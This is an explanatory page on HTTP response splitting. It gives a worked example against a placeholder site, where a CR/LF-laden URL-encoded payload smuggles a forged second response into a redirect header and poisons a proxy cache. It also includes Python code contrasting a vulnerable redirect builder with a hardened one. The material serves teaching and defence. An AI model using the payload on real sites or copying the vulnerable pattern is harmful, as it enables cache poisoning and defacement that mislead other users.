HTTP Splitting

HTTP splitting is an attack that exploits a lack of input sanitization: an attacker is able to insert CR and LF characters into the headers of the web application's response and thereby 'split' the single HTTP response into two different HTTP responses.

Suppose the web site www.victim.com has a reverse proxy in front of the web server that caches the server's responses to user requests. Suppose also that when a user visits http://www.victim.com/index.html with the URL parameter interface=advanced, the request is redirected to http://www.victim.com/main.jsp?interface=advanced:

GET http://www.victim.com/index.html?interface=advanced HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced

When receiving this message, the browser will bring the user to the page indicated in the Location header, i.e. http://victim.com/main.jsp?interface=advanced.

However, if the application does not filter the user input (interface=advanced), the attacker can replace the value of the "interface" URL parameter with the following:

advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a
Content-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a
<html>Sorry,%20System%20Down</html>

Here %0d%0a represents the CR and LF characters. The response from the web application will be split into two:

The first response:

HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced
Content-Length: 0

The second response:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

<html>Sorry,%20System%20Down</html>

When the reverse proxy caches the response, it will cache the more recent second HTTP response as the response to the HTTP request for http://www.victim.com/index.html.

When other users visit the same URL, they will receive the cached response from the reverse proxy, which tells them that the victim web site is down:

GET http://www.victim.com/index.html?interface=advanced HTTP/1.0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

<html>Sorry,%20System%20Down</html>
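The following is an added Python illustration, not part of the original page: it builds the redirect described above both the vulnerable way (decoded parameter pasted straight into Location) and the hardened way (control characters rejected before the value reaches a header), and counts how many status lines a downstream proxy would see in each case. The payload string is the page's own example; the function and exception names are assumptions made for the example.

```python
from urllib.parse import unquote

# Constructed: the URL-encoded parameter value from the page's example, as a
# server receives it in the query string before decoding.
PAYLOAD = (
    "advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a"
    "<html>Sorry,%20System%20Down</html>"
)
REDIRECT = "http://victim.com/main.jsp?interface="


class HeaderInjectionError(ValueError):
    """Raised when a header value contains characters that could end a header or a response."""


def build_redirect_vulnerable(interface: str) -> bytes:
    # The page's bug: the decoded parameter is pasted into Location with no check,
    # so CR LF inside it terminates the header and whatever follows is sent verbatim.
    value = unquote(interface)
    head = f"HTTP/1.1 302 Moved Temporarily\r\nLocation: {REDIRECT}{value}\r\n\r\n"
    return head.encode("latin-1")


def safe_header_value(value: str) -> str:
    # Reject CR, LF and every other control character: a header value must be a
    # single line, and rejecting (rather than stripping) keeps the failure visible.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise HeaderInjectionError("control character in header value")
    return value


def build_redirect_hardened(interface: str) -> bytes:
    value = safe_header_value(unquote(interface))
    head = f"HTTP/1.1 302 Moved Temporarily\r\nLocation: {REDIRECT}{value}\r\n\r\n"
    return head.encode("latin-1")


def count_responses(raw: bytes) -> int:
    # A proxy parsing this byte stream starts a new response at every status line;
    # anything above 1 for a single request means the response was split.
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1."))


if __name__ == "__main__":
    print("vulnerable:", count_responses(build_redirect_vulnerable(PAYLOAD)), "responses")
    try:
        build_redirect_hardened(PAYLOAD)
    except HeaderInjectionError as exc:
        print("hardened: rejected,", exc)
```

The same check belongs on every header whose value derives from a request (Set-Cookie, Content-Type, custom headers), not only Location; most modern frameworks apply it for you, and the example shows what that built-in check is protecting against.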